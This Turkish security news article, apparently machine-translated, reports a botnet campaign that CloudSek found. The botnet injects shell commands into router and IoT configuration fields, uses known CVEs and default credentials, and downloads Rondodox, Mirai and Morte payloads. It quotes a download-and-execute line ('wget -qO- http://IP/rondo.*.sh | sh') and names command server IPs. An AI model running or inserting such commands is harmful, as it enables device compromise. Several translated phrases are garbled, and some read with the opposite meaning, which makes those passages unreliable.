Dünyanın dört bir yanındaki internete bağlı cihazları sistematik olarak silahlandırmak için bir hizmet olarak yükleyici modeli kullanan sofistike bir botnet operasyonu ortaya çıktı.
Kampanya, siber suçlu taktiklerde endişe verici bir evrim göstererek, web arayüzlerindeki komut enjeksiyon güvenlik açıkları yoluyla SOHO yönlendiricileri, IoT cihazları ve kurumsal uygulamalardan yararlanıyor.
Kötü niyetli altyapı, NTP, Syslog ve ana bilgisayar adı yapılandırmaları dahil olmak üzere ağ yönetimi alanlarında tasarlanmayan post parametrelerini hedefleyerek çalışır.
Saldırganlar, bu savunmasız girdi alanlarına kabuk komutları enjekte ederek, wget -qO- http://IP/rondo.*.sh | sh.
Bu yaklaşım, operasyonel gizliliği korurken farklı cihaz mimarilerindeki başarı oranlarını en üst düzeye çıkarır.
BOTNET, yönetici: yönetici kombinasyonları gibi varsayılan kimlik bilgilerini kullanarak otomatik kimlik doğrulama probları ile başlayarak birden fazla saldırı aşamasında sistematik olarak ilerler.
Başarılı erişim üzerine işlem, 74.194.191.52, 83.252.42.112 ve 196.251.73.24 dahil olmak üzere birden fazla IP adresini kapsayan dağıtılmış komut altyapısından Rondodox, Mirai ve Morte yüklerini indiren getir ve denetim zincirlerini dağıtır.
CloudSek analistleri, bu kampanyayı altı aylık operasyonları kapsayan açık komut ve kontrol günlükleri aracılığıyla tanımladı.
Güvenlik firmasının üçlü platformu, ayrıntılı saldırı vektörleri ve altyapı dağıtım modelleri içeren logger panelleri keşfetti ve Botnet’in operasyonel metodolojisine benzeri görülmemiş bir görünürlük sağladı.
Kötü amaçlı yazılım, platformlar arası uyumluluk için meşgul kutu yardımcı programları kullanarak çok mimari yük desteği yoluyla dikkate değer bir uyum gösterir.
İşlem, Oracle WebLogic sunucularını, gömülü Linux sistemlerini ve wlwps.htm ve wan_dyna.html sayfalarını içeren belirli yönlendirici yönetim arayüzlerini hedefler.
Ayrıca, kampanya CVE-2019-17574 (WordPress pop-up üreticisi), CVE-2019-16759 (Vbulletin Pre-Auth RCE) ve CVE-2012-1823 (PHP-CGI sorgu dizesi işleme) dahil olmak üzere bilinen CVES’ten yararlanır.
Komut Enjeksiyon Saldırı Mekanizması
Botnet’in birincil infiltrasyon yöntemi, sofistike komut enjeksiyon teknikleri aracılığıyla Web GUI alanlarından yararlanmaya odaklanmaktadır.
İşlem, özellikle yöneticilerin tipik olarak sunucu adreslerini ve sistem ayarlarını girdiği ağ yapılandırma parametrelerini hedefler.
Cihazlar bu kötü biçimlendirilmiş girdileri uygun bir sanitizasyon olmadan işlediğinde, enjekte edilen komutlar sistem ayrıcalıklarıyla yürütülür.
Saldırı zinciri, yük dağıtım başarısını sağlamak için birden fazla geri dönüş protokolü kullanır. HTTP tabanlı WGY komutları başarısız olursa, sistem otomatik olarak FTPGET ve TFTP gibi komutları kullanarak TFTP ve FTP transferlerini dener.
.webp)
Bu yedeklilik, çok sayıda IP adresinde aynı yükleri barındırma ile birleştiğinde, tek tek sunucu yayından kaldırılmalardan kurtulan esnek bir dağıtım ağı oluşturur.
Arabaşlık sonrası BOTNET, Yanıt VerDeviceInfo modülleri aracılığıyla kapsamlı cihaz parmak izi, MAC adreslerini, ana bilgisayar adlarını, ürün yazılımı sürümlerini ve mevcut hizmetleri toplayarak gerçekleştirir.
Bu keşif, hangi mimariye özgü ikili ikili dosyaların konuşlandırılacağını ve cihazların kripto para madenciliği, DDOS katılımı veya diğer tehdit aktörlerine erişim bilgileri olarak satılmayacağını belirler.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
